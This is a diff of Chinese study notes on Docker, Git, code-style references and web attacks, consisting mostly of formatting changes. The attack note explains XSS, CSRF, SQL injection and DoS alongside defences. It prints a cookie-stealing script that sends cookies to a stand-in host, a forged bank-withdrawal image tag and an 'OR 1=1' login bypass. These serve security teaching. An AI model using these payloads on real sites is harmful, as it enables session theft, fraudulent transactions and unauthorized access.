auto commit

docs/notes/Docker.md

-[🎉 面试进阶指南已上线](https://xiaozhuanlan.com/CyC2018)
-<!-- GFM-TOC -->
-* [一、解决的问题](#一解决的问题)
-* [二、与虚拟机的比较](#二与虚拟机的比较)
-* [三、优势](#三优势)
-* [四、使用场景](#四使用场景)
-* [五、镜像与容器](#五镜像与容器)
-* [参考资料](#参考资料)
-<!-- GFM-TOC -->
-
-
-# 一、解决的问题
+# 一、解决的问题
 
 由于不同的机器有不同的操作系统，以及不同的库和组件，在将一个应用部署到多台机器上需要进行大量的环境配置操作。
 
-Docker 主要解决环境配置问题，它是一种虚拟化技术，对进程进行隔离，被隔离的进程独立于宿主操作系统和其它隔离的进程。使用 Docker 可以不修改应用程序代码，不需要开发人员学习特定环境下的技术，就能够将现有的应用程序部署在其他机器中。
+Docker 主要解决环境配置问题，它是一种虚拟化技术，对进程进行隔离，被隔离的进程独立于宿主操作系统和其它隔离的进程。使用 Docker 可以不修改应用程序代码，不需要开发人员学习特定环境下的技术，就能够将现有的应用程序部署在其他机器中。
 
-<div align="center"> <img src="pics/011f3ef6-d824-4d43-8b2c-36dab8eaaa72-1.png" width="400px"/> </div><br>
+<img src="pics/011f3ef6-d824-4d43-8b2c-36dab8eaaa72-1.png" width="400px"/>
 
-# 二、与虚拟机的比较
+# 二、与虚拟机的比较
 
-虚拟机也是一种虚拟化技术，它与 Docker 最大的区别在于它是通过模拟硬件，并在硬件上安装操作系统来实现。
+虚拟机也是一种虚拟化技术，它与 Docker 最大的区别在于它是通过模拟硬件，并在硬件上安装操作系统来实现。
 
-<div align="center"> <img src="pics/71f61bc3-582d-4c27-8bdd-dc7fb135bf8f.png" width="250px"/> </div><br>
+<img src="pics/71f61bc3-582d-4c27-8bdd-dc7fb135bf8f.png" width="250px"/>
 
-<div align="center"> <img src="pics/7e873b60-44dc-4911-b080-defd5b8f0b49.png" width="250"/> </div><br>
+<img src="pics/7e873b60-44dc-4911-b080-defd5b8f0b49.png" width="250"/>
 
-## 启动速度
+## 启动速度
 
 启动虚拟机需要启动虚拟机的操作系统，再启动应用，这个过程非常慢；
 
-而启动 Docker 相当于启动宿主操作系统上的一个进程。
+而启动 Docker 相当于启动宿主操作系统上的一个进程。
 
-## 占用资源
+## 占用资源
 
-虚拟机是一个完整的操作系统，需要占用大量的磁盘、内存和 CPU，一台机器只能开启几十个的虚拟机。
+虚拟机是一个完整的操作系统，需要占用大量的磁盘、内存和 CPU，一台机器只能开启几十个的虚拟机。
 
-而 Docker 只是一个进程，只需要将应用以及相关的组件打包，在运行时占用很少的资源，一台机器可以开启成千上万个 Docker。
+而 Docker 只是一个进程，只需要将应用以及相关的组件打包，在运行时占用很少的资源，一台机器可以开启成千上万个 Docker。
 
-# 三、优势
+# 三、优势
 
-除了启动速度快以及占用资源少之外，Docker 具有以下优势：
+除了启动速度快以及占用资源少之外，Docker 具有以下优势：
 
-## 更容易迁移
+## 更容易迁移
 
 提供一致性的运行环境，可以在不同的机器上进行迁移，而不用担心环境变化导致无法运行。
 
-## 更容易维护
+## 更容易维护
 
 使用分层技术和镜像，使得应用可以更容易复用重复部分。复用程度越高，维护工作也越容易。
 
-## 更容易扩展
+## 更容易扩展
 
 可以使用基础镜像进一步扩展得到新的镜像，并且官方和开源社区提供了大量的镜像，通过扩展这些镜像可以非常容易得到我们想要的镜像。
 
-# 四、使用场景
+# 四、使用场景
 
-## 持续集成
+## 持续集成
 
 持续集成指的是频繁地将代码集成到主干上，这样能够更快地发现错误。
 
-Docker 具有轻量级以及隔离性的特点，在将代码集成到一个 Docker 中不会对其它 Docker 产生影响。
+Docker 具有轻量级以及隔离性的特点，在将代码集成到一个 Docker 中不会对其它 Docker 产生影响。
 
-## 提供可伸缩的云服务
+## 提供可伸缩的云服务
 
-根据应用的负载情况，可以很容易地增加或者减少 Docker。
+根据应用的负载情况，可以很容易地增加或者减少 Docker。
 
-## 搭建微服务架构
+## 搭建微服务架构
 
-Docker 轻量级的特点使得它很适合用于部署、维护、组合微服务。
+Docker 轻量级的特点使得它很适合用于部署、维护、组合微服务。
 
-# 五、镜像与容器
+# 五、镜像与容器
 
 镜像是一种静态的结构，可以看成面向对象里面的类，而容器是镜像的一个实例。
 
-镜像包含着容器运行时所需要的代码以及其它组件，它是一种分层结构，每一层都是只读的（read-only layers）。构建镜像时，会一层一层构建，前一层是后一层的基础。镜像的这种分层存储结构很适合镜像的复用以及定制。
+镜像包含着容器运行时所需要的代码以及其它组件，它是一种分层结构，每一层都是只读的（read-only layers）。构建镜像时，会一层一层构建，前一层是后一层的基础。镜像的这种分层存储结构很适合镜像的复用以及定制。
 
-构建容器时，通过在镜像的基础上添加一个可写层（writable layer），用来保存着容器运行过程中的修改。
+构建容器时，通过在镜像的基础上添加一个可写层（writable layer），用来保存着容器运行过程中的修改。
 
-<div align="center"> <img src="pics/docker-filesystems-busyboxrw.png"/> </div><br>
+![](pics/docker-filesystems-busyboxrw.png)
 
-# 参考资料
+# 参考资料
 
-- [DOCKER 101: INTRODUCTION TO DOCKER WEBINAR RECAP](https://blog.docker.com/2017/08/docker-101-introduction-docker-webinar-recap/)
-- [Docker 入门教程](http://www.ruanyifeng.com/blog/2018/02/docker-tutorial.html)
-- [Docker container vs Virtual machine](http://www.bogotobogo.com/DevOps/Docker/Docker_Container_vs_Virtual_Machine.php)
-- [How to Create Docker Container using Dockerfile](https://linoxide.com/linux-how-to/dockerfile-create-docker-container/)
-- [理解 Docker（2）：Docker 镜像](http://www.cnblogs.com/sammyliu/p/5877964.html)
-- [为什么要使用 Docker？](https://yeasy.gitbooks.io/docker_practice/introduction/why.html)
-- [What is Docker](https://www.docker.com/what-docker)
-- [持续集成是什么？](http://www.ruanyifeng.com/blog/2015/09/continuous-integration.html)
+- [DOCKER 101: INTRODUCTION TO DOCKER WEBINAR RECAP](https://blog.docker.com/2017/08/docker-101-introduction-docker-webinar-recap/)
+- [Docker 入门教程](http://www.ruanyifeng.com/blog/2018/02/docker-tutorial.html)
+- [Docker container vs Virtual machine](http://www.bogotobogo.com/DevOps/Docker/Docker_Container_vs_Virtual_Machine.php)
+- [How to Create Docker Container using Dockerfile](https://linoxide.com/linux-how-to/dockerfile-create-docker-container/)
+- [理解 Docker（2）：Docker 镜像](http://www.cnblogs.com/sammyliu/p/5877964.html)
+- [为什么要使用 Docker？](https://yeasy.gitbooks.io/docker_practice/introduction/why.html)
+- [What is Docker](https://www.docker.com/what-docker)
+- [持续集成是什么？](http://www.ruanyifeng.com/blog/2015/09/continuous-integration.html)
 
+---bottom---CyC---
+![](pics/011f3ef6-d824-4d43-8b2c-36dab8eaaa72-1.png)
+![](pics/71f61bc3-582d-4c27-8bdd-dc7fb135bf8f.png)
+![](pics/7e873b60-44dc-4911-b080-defd5b8f0b49.png)
+![](pics/docker-filesystems-busyboxrw.png)

docs/notes/Git.md

-[🎉 面试进阶指南已上线](https://xiaozhuanlan.com/CyC2018)
-<!-- GFM-TOC -->
-* [集中式与分布式](#集中式与分布式)
-* [中心服务器](#中心服务器)
-* [工作流](#工作流)
-* [分支实现](#分支实现)
-* [冲突](#冲突)
-* [Fast forward](#fast-forward)
-* [分支管理策略](#分支管理策略)
-* [储藏（Stashing）](#储藏stashing)
-* [SSH 传输设置](#ssh-传输设置)
-* [.gitignore 文件](#gitignore-文件)
-* [Git 命令一览](#git-命令一览)
-* [参考资料](#参考资料)
-<!-- GFM-TOC -->
-
-
-# 集中式与分布式
-
-Git 属于分布式版本控制系统，而 SVN 属于集中式。
+# 集中式与分布式
+
+Git 属于分布式版本控制系统，而 SVN 属于集中式。
 
 集中式版本控制只有中心服务器拥有一份代码，而分布式版本控制每个人的电脑上就有一份完整的代码。
 
@@ -27,133 +10,133 @@ Git 属于分布式版本控制系统，而 SVN 属于集中式。
 
 分布式版本控制新建分支、合并分支操作速度非常快，而集中式版本控制新建一个分支相当于复制一份完整代码。
 
-# 中心服务器
+# 中心服务器
 
-中心服务器用来交换每个用户的修改，没有中心服务器也能工作，但是中心服务器能够 24 小时保持开机状态，这样就能更方便的交换修改。
+中心服务器用来交换每个用户的修改，没有中心服务器也能工作，但是中心服务器能够 24 小时保持开机状态，这样就能更方便的交换修改。
 
-Github 就是一个中心服务器。
+Github 就是一个中心服务器。
 
-# 工作流
+# 工作流
 
-<div align="center"> <img src="pics/a1198642-9159-4d88-8aec-c3b04e7a2563.jpg"/> </div><br>
+![](index_files/a1198642-9159-4d88-8aec-c3b04e7a2563.jpg)
 
-新建一个仓库之后，当前目录就成为了工作区，工作区下有一个隐藏目录 .git，它属于 Git 的版本库。
+新建一个仓库之后，当前目录就成为了工作区，工作区下有一个隐藏目录 .git，它属于 Git 的版本库。
 
-Git 版本库有一个称为 stage 的暂存区，还有自动创建的 master 分支以及指向分支的 HEAD 指针。
+Git 版本库有一个称为 stage 的暂存区，还有自动创建的 master 分支以及指向分支的 HEAD 指针。
 
-<div align="center"> <img src="pics/46f66e88-e65a-4ad0-a060-3c63fe22947c.png"/> </div><br>
+![](index_files/46f66e88-e65a-4ad0-a060-3c63fe22947c.png)
 
-- git add files 把文件的修改添加到暂存区
-- git commit 把暂存区的修改提交到当前分支，提交之后暂存区就被清空了
-- git reset -- files 使用当前分支上的修改覆盖暂存区，用来撤销最后一次 git add files
-- git checkout -- files 使用暂存区的修改覆盖工作目录，用来撤销本地修改
+- git add files 把文件的修改添加到暂存区
+- git commit 把暂存区的修改提交到当前分支，提交之后暂存区就被清空了
+- git reset -- files 使用当前分支上的修改覆盖暂存区，用来撤销最后一次 git add files
+- git checkout -- files 使用暂存区的修改覆盖工作目录，用来撤销本地修改
 
-<div align="center"> <img src="pics/17976404-95f5-480e-9cb4-250e6aa1d55f.png"/> </div><br>
+![](index_files/17976404-95f5-480e-9cb4-250e6aa1d55f.png)
 
 可以跳过暂存区域直接从分支中取出修改，或者直接提交修改到分支中。
 
-- git commit -a 直接把所有文件的修改添加到暂存区然后执行提交
-- git checkout HEAD -- files 取出最后一次修改，可以用来进行回滚操作
+- git commit -a 直接把所有文件的修改添加到暂存区然后执行提交
+- git checkout HEAD -- files 取出最后一次修改，可以用来进行回滚操作
 
-# 分支实现
+# 分支实现
 
-使用指针将每个提交连接成一条时间线，HEAD 指针指向当前分支指针。
+使用指针将每个提交连接成一条时间线，HEAD 指针指向当前分支指针。
 
-<div align="center"> <img src="pics/fb546e12-e1fb-4b72-a1fb-8a7f5000dce6.jpg"/> </div><br>
+![](index_files/fb546e12-e1fb-4b72-a1fb-8a7f5000dce6.jpg)
 
-新建分支是新建一个指针指向时间线的最后一个节点，并让 HEAD 指针指向新分支表示新分支成为当前分支。
+新建分支是新建一个指针指向时间线的最后一个节点，并让 HEAD 指针指向新分支表示新分支成为当前分支。
 
-<div align="center"> <img src="pics/bc775758-89ab-4805-9f9c-78b8739cf780.jpg"/> </div><br>
+![](index_files/bc775758-89ab-4805-9f9c-78b8739cf780.jpg)
 
 每次提交只会让当前分支指针向前移动，而其它分支指针不会移动。
 
-<div align="center"> <img src="pics/5292faa6-0141-4638-bf0f-bb95b081dcba.jpg"/> </div><br>
+![](index_files/5292faa6-0141-4638-bf0f-bb95b081dcba.jpg)
 
 合并分支也只需要改变指针即可。
 
-<div align="center"> <img src="pics/1164a71f-413d-494a-9cc8-679fb6a2613d.jpg"/> </div><br>
+![](index_files/1164a71f-413d-494a-9cc8-679fb6a2613d.jpg)
 
-# 冲突
+# 冲突
 
 当两个分支都对同一个文件的同一行进行了修改，在分支合并时就会产生冲突。
 
-<div align="center"> <img src="pics/58e57a21-6b6b-40b6-af85-956dd4e0f55a.jpg"/> </div><br>
+![](index_files/58e57a21-6b6b-40b6-af85-956dd4e0f55a.jpg)
 
-Git 会使用 <<<<<<< ，======= ，>>>>>>> 标记出不同分支的内容，只需要把不同分支中冲突部分修改成一样就能解决冲突。
+Git 会使用 <<<<<<< ，======= ，>>>>>>> 标记出不同分支的内容，只需要把不同分支中冲突部分修改成一样就能解决冲突。
 
 ```
-<<<<<<< HEAD
-Creating a new branch is quick & simple.
+<<<<<<< HEAD
+Creating a new branch is quick & simple.
 =======
-Creating a new branch is quick AND simple.
->>>>>>> feature1
+Creating a new branch is quick AND simple.
+>>>>>>> feature1
 ```
 
-# Fast forward
+# Fast forward
 
-"快进式合并"（fast-farward merge），会直接将 master 分支指向合并的分支，这种模式下进行分支合并会丢失分支信息，也就不能在分支历史上看出分支信息。
+"快进式合并"（fast-farward merge），会直接将 master 分支指向合并的分支，这种模式下进行分支合并会丢失分支信息，也就不能在分支历史上看出分支信息。
 
-可以在合并时加上 --no-ff 参数来禁用 Fast forward 模式，并且加上 -m 参数让合并时产生一个新的 commit。
+可以在合并时加上 --no-ff 参数来禁用 Fast forward 模式，并且加上 -m 参数让合并时产生一个新的 commit。
 
 ```
-$ git merge --no-ff -m "merge with no-ff" dev
+$ git merge --no-ff -m "merge with no-ff" dev
 ```
 
-<div align="center"> <img src="pics/dd78a1fe-1ff3-4bcf-a56f-8c003995beb6.jpg"/> </div><br>
+![](index_files/dd78a1fe-1ff3-4bcf-a56f-8c003995beb6.jpg)
 
-# 分支管理策略
+# 分支管理策略
 
-master 分支应该是非常稳定的，只用来发布新版本；
+master 分支应该是非常稳定的，只用来发布新版本；
 
-日常开发在开发分支 dev 上进行。
+日常开发在开发分支 dev 上进行。
 
-<div align="center"> <img src="pics/245fd2fb-209c-4ad5-bc5e-eb5664966a0e.jpg"/> </div><br>
+![](index_files/245fd2fb-209c-4ad5-bc5e-eb5664966a0e.jpg)
 
-# 储藏（Stashing）
+# 储藏（Stashing）
 
 在一个分支上操作之后，如果还没有将修改提交到分支上，此时进行切换分支，那么另一个分支上也能看到新的修改。这是因为所有分支都共用一个工作区的缘故。
 
-可以使用 git stash 将当前分支的修改储藏起来，此时当前工作区的所有修改都会被存到栈上，也就是说当前工作区是干净的，没有任何未提交的修改。此时就可以安全的切换到其它分支上了。
+可以使用 git stash 将当前分支的修改储藏起来，此时当前工作区的所有修改都会被存到栈上，也就是说当前工作区是干净的，没有任何未提交的修改。此时就可以安全的切换到其它分支上了。
 
 ```
-$ git stash
-Saved working directory and index state \ "WIP on master: 049d078 added the index file"
-HEAD is now at 049d078 added the index file (To restore them type "git stash apply")
+$ git stash
+Saved working directory and index state \ "WIP on master: 049d078 added the index file"
+HEAD is now at 049d078 added the index file (To restore them type "git stash apply")
 ```
 
-该功能可以用于 bug 分支的实现。如果当前正在 dev 分支上进行开发，但是此时 master 上有个 bug 需要修复，但是 dev 分支上的开发还未完成，不想立即提交。在新建 bug 分支并切换到 bug 分支之前就需要使用 git stash 将 dev 分支的未提交修改储藏起来。
+该功能可以用于 bug 分支的实现。如果当前正在 dev 分支上进行开发，但是此时 master 上有个 bug 需要修复，但是 dev 分支上的开发还未完成，不想立即提交。在新建 bug 分支并切换到 bug 分支之前就需要使用 git stash 将 dev 分支的未提交修改储藏起来。
 
-# SSH 传输设置
+# SSH 传输设置
 
-Git 仓库和 Github 中心仓库之间的传输是通过 SSH 加密。
+Git 仓库和 Github 中心仓库之间的传输是通过 SSH 加密。
 
-如果工作区下没有 .ssh 目录，或者该目录下没有 id_rsa 和 id_rsa.pub 这两个文件，可以通过以下命令来创建 SSH Key：
+如果工作区下没有 .ssh 目录，或者该目录下没有 id_rsa 和 id_rsa.pub 这两个文件，可以通过以下命令来创建 SSH Key：
 
 ```
-$ ssh-keygen -t rsa -C "youremail@example.com"
+$ ssh-keygen -t rsa -C "youremail@example.com"
 ```
 
-然后把公钥 id_rsa.pub 的内容复制到 Github "Account settings" 的 SSH Keys 中。
+然后把公钥 id_rsa.pub 的内容复制到 Github "Account settings" 的 SSH Keys 中。
 
-# .gitignore 文件
+# .gitignore 文件
 
 忽略以下文件：
 
-- 操作系统自动生成的文件，比如缩略图；
-- 编译生成的中间文件，比如 Java 编译产生的 .class 文件；
-- 自己的敏感信息，比如存放口令的配置文件。
+- 操作系统自动生成的文件，比如缩略图；
+- 编译生成的中间文件，比如 Java 编译产生的 .class 文件；
+- 自己的敏感信息，比如存放口令的配置文件。
 
-不需要全部自己编写，可以到 [https://github.com/github/gitignore](https://github.com/github/gitignore) 中进行查询。
+不需要全部自己编写，可以到 [https://github.com/github/gitignore](https://github.com/github/gitignore) 中进行查询。
 
-# Git 命令一览
+# Git 命令一览
 
-<div align="center"> <img src="pics/7a29acce-f243-4914-9f00-f2988c528412.jpg"/> </div><br>
+![](index_files/7a29acce-f243-4914-9f00-f2988c528412.jpg)
 
 比较详细的地址：http://www.cheat-sheets.org/saved-copy/git-cheat-sheet.pdf
 
-# 参考资料
+# 参考资料
 
-- [Git - 简明指南](http://rogerdudler.github.io/git-guide/index.zh.html)
-- [图解 Git](http://marklodato.github.io/visual-git-guide/index-zh-cn.html)
-- [廖雪峰 : Git 教程](https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000)
-- [Learn Git Branching](https://learngitbranching.js.org/)
+- [Git - 简明指南](http://rogerdudler.github.io/git-guide/index.zh.html)
+- [图解 Git](http://marklodato.github.io/visual-git-guide/index-zh-cn.html)
+- [廖雪峰 : Git 教程](https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000)
+- [Learn Git Branching](https://learngitbranching.js.org/)

docs/notes/代码风格规范.md

-[🎉 面试进阶指南已上线](https://xiaozhuanlan.com/CyC2018)
-<!-- GFM-TOC -->
-<!-- GFM-TOC -->
-
-
-- [Twitter Java Style Guide](https://github.com/twitter/commons/blob/master/src/java/com/twitter/common/styleguide.md)
-- [Google Java Style Guide](http://google.github.io/styleguide/javaguide.html)
-- [阿里巴巴Java开发手册](https://github.com/alibaba/p3c/blob/master/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4Java%E5%BC%80%E5%8F%91%E6%89%8B%E5%86%8C%EF%BC%88%E8%AF%A6%E5%B0%BD%E7%89%88%EF%BC%89.pdf)
+- [Twitter Java Style Guide](https://github.com/twitter/commons/blob/master/src/java/com/twitter/common/styleguide.md)
+- [Google Java Style Guide](http://google.github.io/styleguide/javaguide.html)
+- [阿里巴巴Java开发手册](https://github.com/alibaba/p3c/blob/master/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4Java%E5%BC%80%E5%8F%91%E6%89%8B%E5%86%8C%EF%BC%88%E8%AF%A6%E5%B0%BD%E7%89%88%EF%BC%89.pdf)

docs/notes/攻击技术.md

-[🎉 面试进阶指南已上线](https://xiaozhuanlan.com/CyC2018)
-<!-- GFM-TOC -->
-* [一、跨站脚本攻击](#一跨站脚本攻击)
-* [二、跨站请求伪造](#二跨站请求伪造)
-* [三、SQL 注入攻击](#三sql-注入攻击)
-* [四、拒绝服务攻击](#四拒绝服务攻击)
-* [参考资料](#参考资料)
-<!-- GFM-TOC -->
+# 一、跨站脚本攻击
 
+## 概念
 
-# 一、跨站脚本攻击
+跨站脚本攻击（Cross-Site Scripting, XSS），可以将代码注入到用户浏览的网页上，这种代码包括 HTML 和 JavaScript。
 
-## 概念
-
-跨站脚本攻击（Cross-Site Scripting, XSS），可以将代码注入到用户浏览的网页上，这种代码包括 HTML 和 JavaScript。
-
-## 攻击原理
+## 攻击原理
 
 例如有一个论坛网站，攻击者可以在上面发布以下内容：
 
 ```html
-<script>location.href="//domain.com/?c=" + document.cookie</script>
+<script>location.href="//domain.com/?c=" + document.cookie</script>
 ```
 
 之后该内容可能会被渲染成以下形式：
 
 ```html
-<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>
+<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>
 ```
 
-另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态，那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。
+另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态，那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。
 
-## 危害
+## 危害
 
-- 窃取用户的 Cookie
-- 伪造虚假的输入表单骗取个人信息
-- 显示伪造的文章或者图片
+- 窃取用户的 Cookie
+- 伪造虚假的输入表单骗取个人信息
+- 显示伪造的文章或者图片
 
-## 防范手段
+## 防范手段
 
-### 1. 设置 Cookie 为 HttpOnly
+### 1. 设置 Cookie 为 HttpOnly
 
-设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用，就无法通过 document.cookie 获取用户 Cookie 信息。
+设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用，就无法通过 document.cookie 获取用户 Cookie 信息。
 
-### 2. 过滤特殊字符
+### 2. 过滤特殊字符
 
-例如将 `<` 转义为 `&lt;`，将 `>` 转义为 `&gt;`，从而避免 HTML 和 Jascript 代码的运行。
+例如将 `<` 转义为 `&lt;`，将 `>` 转义为 `&gt;`，从而避免 HTML 和 Jascript 代码的运行。
 
-富文本编辑器允许用户输入 HTML 代码，就不能简单地将 `<` 等字符进行过滤了，极大地提高了 XSS 攻击的可能性。
+富文本编辑器允许用户输入 HTML 代码，就不能简单地将 `<` 等字符进行过滤了，极大地提高了 XSS 攻击的可能性。
 
-富文本编辑器通常采用 XSS filter 来防范 XSS 攻击，通过定义一些标签白名单或者黑名单，从而不允许有攻击性的 HTML 代码的输入。
+富文本编辑器通常采用 XSS filter 来防范 XSS 攻击，通过定义一些标签白名单或者黑名单，从而不允许有攻击性的 HTML 代码的输入。
 
-以下例子中，form 和 script 等标签都被转义，而 h 和 p 等标签将会保留。
+以下例子中，form 和 script 等标签都被转义，而 h 和 p 等标签将会保留。
 
 ```html
-<h1 id="title">XSS Demo</h1>
+<h1 id="title">XSS Demo</h1>
 
 <p>123</p>
 
 <form>
-  <input type="text" name="q" value="test">
+  <input type="text" name="q" value="test">
 </form>
 
 <pre>hello</pre>
 
-<script type="text/javascript">
+<script type="text/javascript">
 alert(/xss/);
 </script>
 ```
 
 ```html
-<h1>XSS Demo</h1>
+<h1>XSS Demo</h1>
 
 <p>123</p>
 
 &lt;form&gt;
-  &lt;input type="text" name="q" value="test"&gt;
+  &lt;input type="text" name="q" value="test"&gt;
 &lt;/form&gt;
 
 <pre>hello</pre>
 
-&lt;script type="text/javascript"&gt;
+&lt;script type="text/javascript"&gt;
 alert(/xss/);
 &lt;/script&gt;
 ```
 
-> [XSS 过滤在线测试](http://jsxss.com/zh/try.html)
+> [XSS 过滤在线测试](http://jsxss.com/zh/try.html)
 
-# 二、跨站请求伪造
+# 二、跨站请求伪造
 
-## 概念
+## 概念
 
-跨站请求伪造（Cross-site request forgery，CSRF），是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过，所以被访问的网站会认为是真正的用户操作而去执行。
+跨站请求伪造（Cross-site request forgery，CSRF），是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过，所以被访问的网站会认为是真正的用户操作而去执行。
 
-XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户浏览器的信任。
+XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户浏览器的信任。
 
-## 攻击原理
+## 攻击原理
 
-假如一家银行用以执行转账操作的 URL 地址如下：
+假如一家银行用以执行转账操作的 URL 地址如下：
 
 ```
 http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName。
@@ -105,90 +95,90 @@ http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName
 那么，一个恶意攻击者可以在另一个网站上放置如下代码：
 
 ```
-<img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">。
+<img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">。
 ```
 
-如果有账户名为 Alice 的用户访问了恶意站点，而她之前刚访问过银行不久，登录信息尚未过期，那么她就会损失 1000 美元。
+如果有账户名为 Alice 的用户访问了恶意站点，而她之前刚访问过银行不久，登录信息尚未过期，那么她就会损失 1000 美元。
 
 这种恶意的网址可以有很多种形式，藏身于网页中的许多地方。此外，攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛，博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话，用户即使访问熟悉的可信网站也有受攻击的危险。
 
-通过例子能够看出，攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权，也不能直接窃取用户的任何信息。他们能做到的，是欺骗用户浏览器，让其以用户的名义执行操作。
+通过例子能够看出，攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权，也不能直接窃取用户的任何信息。他们能做到的，是欺骗用户浏览器，让其以用户的名义执行操作。
 
-## 防范手段
+## 防范手段
 
-### 1. 检查 Referer 首部字段
+### 1. 检查 Referer 首部字段
 
-Referer 首部字段位于 HTTP 报文中，用于标识请求来源的地址。检查这个首部字段并要求请求来源的地址在同一个域名下，可以极大的防止 CSRF 攻击。
+Referer 首部字段位于 HTTP 报文中，用于标识请求来源的地址。检查这个首部字段并要求请求来源的地址在同一个域名下，可以极大的防止 CSRF 攻击。
 
-这种办法简单易行，工作量低，仅需要在关键访问处增加一步校验。但这种办法也有其局限性，因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定，但并无法保证来访的浏览器的具体实现，亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器，篡改其 Referer 字段的可能。
+这种办法简单易行，工作量低，仅需要在关键访问处增加一步校验。但这种办法也有其局限性，因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定，但并无法保证来访的浏览器的具体实现，亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器，篡改其 Referer 字段的可能。
 
-### 2. 添加校验 Token
+### 2. 添加校验 Token
 
-在访问敏感数据请求时，要求用户浏览器提供不保存在 Cookie 中，并且攻击者无法伪造的数据作为校验。例如服务器生成随机数并附加在表单中，并要求客户端传回这个随机数。
+在访问敏感数据请求时，要求用户浏览器提供不保存在 Cookie 中，并且攻击者无法伪造的数据作为校验。例如服务器生成随机数并附加在表单中，并要求客户端传回这个随机数。
 
-### 3. 输入验证码
+### 3. 输入验证码
 
-因为 CSRF 攻击是在用户无意识的情况下发生的，所以要求用户输入验证码可以让用户知道自己正在做的操作。
+因为 CSRF 攻击是在用户无意识的情况下发生的，所以要求用户输入验证码可以让用户知道自己正在做的操作。
 
-# 三、SQL 注入攻击
+# 三、SQL 注入攻击
 
-## 概念
+## 概念
 
-服务器上的数据库运行非法的 SQL 语句，主要通过拼接来完成。
+服务器上的数据库运行非法的 SQL 语句，主要通过拼接来完成。
 
-## 攻击原理
+## 攻击原理
 
-例如一个网站登录验证的 SQL 查询代码为：
+例如一个网站登录验证的 SQL 查询代码为：
 
 ```sql
-strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
+strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
 ```
 
 如果填入以下内容：
 
 ```sql
-userName = "1' OR '1'='1";
-passWord = "1' OR '1'='1";
+userName = "1' OR '1'='1";
+passWord = "1' OR '1'='1";
 ```
 
-那么 SQL 查询字符串为：
+那么 SQL 查询字符串为：
 
 ```sql
-strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
+strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
 ```
 
 此时无需验证通过就能执行以下查询：
 
 ```sql
-strSQL = "SELECT * FROM users;"
+strSQL = "SELECT * FROM users;"
 ```
 
-## 防范手段
+## 防范手段
 
-### 1. 使用参数化查询
+### 1. 使用参数化查询
 
-Java 中的 PreparedStatement 是预先编译的 SQL 语句，可以传入适当参数并且多次执行。由于没有拼接的过程，因此可以防止 SQL 注入的发生。
+Java 中的 PreparedStatement 是预先编译的 SQL 语句，可以传入适当参数并且多次执行。由于没有拼接的过程，因此可以防止 SQL 注入的发生。
 
 ```java
-PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
-stmt.setString(1, userid);
-stmt.setString(2, password);
-ResultSet rs = stmt.executeQuery();
+PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
+stmt.setString(1, userid);
+stmt.setString(2, password);
+ResultSet rs = stmt.executeQuery();
 ```
 
-### 2. 单引号转换
+### 2. 单引号转换
 
-将传入的参数中的单引号转换为连续两个单引号，PHP 中的 Magic quote 可以完成这个功能。
+将传入的参数中的单引号转换为连续两个单引号，PHP 中的 Magic quote 可以完成这个功能。
 
-# 四、拒绝服务攻击
+# 四、拒绝服务攻击
 
-拒绝服务攻击（denial-of-service attack，DoS），亦称洪水攻击，其目的在于使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。
+拒绝服务攻击（denial-of-service attack，DoS），亦称洪水攻击，其目的在于使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。
 
-分布式拒绝服务攻击（distributed denial-of-service attack，DDoS），指攻击者使用两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。
+分布式拒绝服务攻击（distributed denial-of-service attack，DDoS），指攻击者使用两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。
 
-# 参考资料
+# 参考资料
 
-- [维基百科：跨站脚本](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC)
